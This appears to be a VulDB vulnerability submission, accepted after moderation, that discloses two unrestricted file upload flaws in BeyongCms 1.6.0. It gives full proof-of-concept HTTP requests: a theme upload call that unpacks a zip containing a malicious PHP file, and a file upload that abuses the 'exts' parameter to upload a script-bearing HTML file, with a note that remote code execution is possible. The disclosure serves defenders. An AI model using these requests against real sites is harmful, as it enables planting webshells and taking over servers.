Submit #558152: BeyongCms 1.6.0 Unrestricted Uploadinfo

TitleBeyongCms 1.6.0 Unrestricted Upload
DescriptionBeyongCms is a lightweight content management system based on the ThinkPHP5.1 framework, suitable for enterprise CMS, individual webmasters, etc., optimized for mobile apps and mini-programs. It provides complete and concise project documentation, facilitating secondary development by developers. Official Website: https://www.beyongcms.com/index.html Gitee: https://gitee.com/youyiio/BeyongCms BeyongCms 1.6.0 contains two file upload vulnerabilities. File Upload Vulnerability 1 Log in to the backend, first upload a zip file containing a malicious PHP file in the document management section. In the admin/controller/Theme upload method, a file ID is accepted, and the path is retrieved from the database based on the file ID for decompression. Construct the interface, pass in the ID value (can be brute-forced if unknown). GET /admin/theme/upload.html?fileId=100013 HTTP/1.1 Host: 127.0.0.1:9999 sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: admin_token=dc14OLsWoc%2B1vm4A%2FXwwjFvsyEpeg1XHI39ooC2h2upXCFXCF4srh6gFGcvNyNMgg9sFxch%2FHUWpA8Xg4S%2Bg86zbDA; cms_entrance_url=http%3A%2F%2F127.0.0.1%3A9999%2Fcms%2Ffeedback%2Findex.html; Hm_lvt_3d0c1af3caa383b0cd59822f1e7a751b=1744276683; HMACCOUNT=C5E5C2ED1B489DE7; admin_username=18888888888; admin_uid=1; Hm_lpvt_3d0c1af3caa383b0cd59822f1e7a751b=1744283707; PHPSESSID=nuh0gdifure8erdklqa2m1m9ps; admin_1_login_hash=4786394367f7af75eb99d Connection: close After decompression, it is located under the theme path. File Upload Vulnerability 2 In the common/controller/File upload method, the native ThinkPHP file upload is used, and the suffix is restricted. However, if the request parameter contains the exts parameter, exts will be considered as the allowed file suffix (except for PHP). Find the calling location, admin/controller/File. Taking uploading HTML as an example (if the server supports parsing of php3, phtml, etc., RCE is also possible). POST /admin/file/upload.html?exts=html HTTP/1.1 Host: 127.0.0.1:9999 Content-Length: 613 sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydZyjjoy48BkB56Gx Accept: application/json Cache-Control: no-cache X-Requested-With: XMLHttpRequest sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1:9999 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:9999/admin/resource/uploadimage.html Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: admin_token=dc14OLsWoc%2B1vm4A%2FXwwjFvsyEpeg1XHI39ooC2h2upXCFXCF4srh6gFGcvNyNMgg9sFxch%2FHUWpA8Xg4S%2Bg86zbDA; cms_entrance_url=http%3A%2F%2F127.0.0.1%3A9999%2Fcms%2Ffeedback%2Findex.html; Hm_lvt_3d0c1af3caa383b0cd59822f1e7a751b=1744276683; HMACCOUNT=C5E5C2ED1B489DE7; admin_username=18888888888; admin_uid=1; PHPSESSID=nuh0gdifure8erdklqa2m1m9ps; admin_1_login_hash=4786394367f7af75eb99d; Hm_lpvt_3d0c1af3caa383b0cd59822f1e7a751b=1744285741 Connection: close ------WebKitFormBoundarydZyjjoy48BkB56Gx Content-Disposition: form-data; name="width" undefined ------WebKitFormBoundarydZyjjoy48BkB56Gx Content-Disposition: form-data; name="height" undefined ------WebKitFormBoundarydZyjjoy48BkB56Gx Content-Disposition: form-data; name="thumbWidth" 140 ------WebKitFormBoundarydZyjjoy48BkB56Gx Content-Disposition: form-data; name="thumbHeight" 140 ------WebKitFormBoundarydZyjjoy48BkB56Gx Content-Disposition: form-data; name="file"; filename="ceshi.html" Content-Type: image/jpeg <script>alert(1)</script> ------WebKitFormBoundarydZyjjoy48BkB56Gx--
Source⚠️ https://wiki.shikangsi.com/post/share/7e2d3cf9-6463-4331-a1f5-c270d5695266
User
 wiki (UID 72124)
Submission04/15/2025 10:48 AM (12 months ago)
Moderation04/26/2025 11:16 AM (11 days later)
StatusAccepted
VulDB entry306342 [youyiio BeyongCms 1.6.0 Document Management Page /admin/theme/Upload.html File unrestricted upload]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!